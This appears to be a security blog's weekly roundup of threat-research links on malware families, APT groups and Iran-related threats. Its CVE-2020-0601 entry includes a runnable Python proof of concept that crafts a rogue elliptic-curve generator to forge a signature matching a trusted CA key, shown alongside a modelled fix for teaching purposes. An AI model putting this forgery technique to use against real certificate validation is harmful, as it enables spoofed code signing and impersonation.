Articles from the past couple of weeks cover cyber threats targeting the electric utility industry and Russian military hackers boring into a Ukrainian gas company. With the events in and around Iran, there was also concern that widespread cyber attacks could follow.
For more articles, check out our #onpatrol4malware blog.
Operation AppleJeus Sequel
Source: Secure List
In 2018, Kaspersky published a report on one of Lazarus’ campaigns, named Operation AppleJeus. Notably, this operation marked the first time Lazarus had targeted macOS users. Read more.
Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets
Source: SentinelLabs
The TrickBot cybercrime enterprise actively develops many of its offensive tools, such as “PowerTrick”, that are leveraged for stealthiness. Read more.
Threat Research
SAIGON, the Mysterious Ursnif Fork
Source: FireEye
Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. Read more.
North American Electric Cyber Threat Perspective
Source: Dragos
The electric utility industry is a valuable target for adversaries seeking to exploit ICS and OT for a variety of purposes. Read more.
Russians Hacked Ukrainian Gas Company at Center of Impeachment
Source: The New York Times
With President Trump facing an impeachment trial, Russian military hackers have been boring into the Ukrainian gas company at the center of the affair, according to security experts. Read more.
DeathRansom Part II: Attribution
Source: Fortinet
In this second part, FortiGuard Labs will try to shed light on how this DeathRansom campaign is connected with other campaigns, and who might be behind them. Read more.
Assessing Iran’s Digital Attack Capabilities
Source: Zerofox
There has been increased speculation and tension surrounding the potential cyber-attacks directed towards the US and its allies. Read more.
Satan ransomware rebrands as 5ss5c ransomware
Source: Blaze
The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named “5ss5c”. Read more.
Hainan Xiandun Technology Company is APT40
Source: Intrusion Truth
Intrusion Truth identified a constellation of front companies for APT activity in Hainan and a computer science specialist at Hainan University who is linked to one of the companies. Read more.
Emotet remains the dark market leader for delivery-as-a-service
Source: Help Net Security
The vast majority of nationally sponsored cybersecurity incidents take the form of espionage through data exfiltration, with frequent employment of remote access tool Plug-X, according to the annual threat report by eSentire. Read more.
Iran and Not Iran: What Our Threat Monitoring Indicates
Source: Team Cymru
We now have a moment to assess the cyber actions in the wake of events in and around Iran. There was concern that the Iranian regime would respond with widespread cyber attacks. Read more.
Beware of this sneaky phishing technique now being used in more attacks
Source: ZDNet
There’s been a large rise in cyber criminals using a particular phishing technique to trick workers into unwittingly installing malware, transferring money or handing over their login credentials. Read more.
Uncle Sam compensates you for data leaks (yeah, right)
Source: Kaspersky
Data leaks of all sorts regularly crop up in the news, and recently so have fines, some potentially reaching into the billions, slapped on the companies responsible. Read more.
CVE-2020-0601 AKA ChainOfFools OR CurveBall
Source: GitHub Gist
Microsoft disclosed a vulnerability in its monthly Patch Tuesday release, referenced under CVE-2020-0601: a spoofing flaw in how the Windows CryptoAPI (crypt32.dll) validates Elliptic Curve Cryptography certificates. The vulnerability was discovered by the U.S. National Security Agency, and the disclosure was accompanied by a blog post and an official security advisory. Read more.
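To make the trust failure concrete, the following is an added worked example (not code from the linked gist, Microsoft or the NSA): it models the CurveBall idea in plain Python with P-256 arithmetic written inline so it runs without third-party libraries. An attacker who knows a trusted CA's public point Q (public by definition) picks any private scalar d' and supplies a certificate with explicit curve parameters whose generator is G' = d'^-1 * Q, so that d' * G' == Q. The two `*_trust_check` functions are a simplified model of the pre-patch and patched behaviour, not CryptoAPI code, and the key values, nonce and message are constructed for reproducibility only.

```python
import hashlib

# NIST P-256 (secp256r1) domain parameters: prime field, curve a/b,
# standard generator G and its order N.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551


def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None                                   # p1 == -p2
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P  # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, point):
    """Double-and-add scalar multiplication k * point."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def hash_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(d, msg, gen, k):
    """ECDSA over whatever generator the caller supplies; k is the nonce."""
    z = hash_int(msg)
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return (r, s)


def ecdsa_verify(pub, msg, sig, gen):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = hash_int(msg)
    w = pow(s, -1, N)
    x = ec_add(ec_mul(z * w % N, gen), ec_mul(r * w % N, pub))
    return x is not None and x[0] % N == r


def craft_curveball_generator(trusted_pub, attacker_d):
    """Return G' = attacker_d^-1 * Q so that attacker_d * G' == Q.

    The attacker now owns a private key whose public point equals the
    trusted CA's point, but only under the attacker's own parameters.
    """
    return ec_mul(pow(attacker_d, -1, N), trusted_pub)


def vulnerable_trust_check(cert_pub, trusted_pub):
    """Modelled pre-patch behaviour: match the public point only, ignoring
    that the certificate carries explicit (attacker-chosen) parameters."""
    return cert_pub == trusted_pub


def fixed_trust_check(cert_pub, cert_gen, trusted_pub):
    """Modelled patched behaviour: the point AND the generator must match
    the named curve the trusted key was issued on."""
    return cert_pub == trusted_pub and cert_gen == G


# Constructed demo values. Private scalars and the nonce are fixed only so the
# run is reproducible; real keys and ECDSA nonces must be random and secret.
CA_PRIVATE = 0x1c8d3f0a7b6e9d2c4f5a8b7e6d9c0f1a2b3c4d5e6f708192a3b4c5d6e7f80912
CA_PUBLIC = ec_mul(CA_PRIVATE, G)            # the only thing the attacker needs
ATTACKER_PRIVATE = 0x0badc0ffee0ddf00d1234567890abcdef1234567890abcdef1234567890abcd
NONCE = 0x2a4c6e8f1d3b5a7c9e0f2b4d6c8e0a1c3e5f7a9b0c2d4e6f8a1b3c5d7e9f0b2d
MESSAGE = b"rogue intermediate certificate (constructed payload)"


def demo():
    g_prime = craft_curveball_generator(CA_PUBLIC, ATTACKER_PRIVATE)
    assert ec_mul(ATTACKER_PRIVATE, g_prime) == CA_PUBLIC   # same public point
    forged = ecdsa_sign(ATTACKER_PRIVATE, MESSAGE, g_prime, NONCE)
    return {
        "point_matches_trusted_ca": vulnerable_trust_check(CA_PUBLIC, CA_PUBLIC),
        "forged_sig_ok_with_cert_params": ecdsa_verify(CA_PUBLIC, MESSAGE, forged, g_prime),
        "forged_sig_ok_with_real_params": ecdsa_verify(CA_PUBLIC, MESSAGE, forged, G),
        "fixed_check_accepts": fixed_trust_check(CA_PUBLIC, g_prime, CA_PUBLIC),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The forged signature verifies only when the verifier takes the generator from the certificate's explicit parameters; under the real P-256 generator it fails, which is why the fix is to reject explicit parameters that do not match the trusted key's named curve rather than to compare public points alone.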
Comparative Analysis of New ZeroCleare Variant, Dustman
Source: IBM X-Force Exchange
A new wiper malware called Dustman was identified by Saudi Arabia’s National Cybersecurity Authority (NCA) and is believed to be a variant of the ZeroCleare malware that X-Force IRIS identified earlier in 2019. Read more.
Deep Dive into the Lyceum Danbot Malware
Source: CyberX
LYCEUM is a threat group first identified by Dell SecureWorks, which appears to be interested in organizations with ICS such as oil and gas companies in the Middle East. Read more.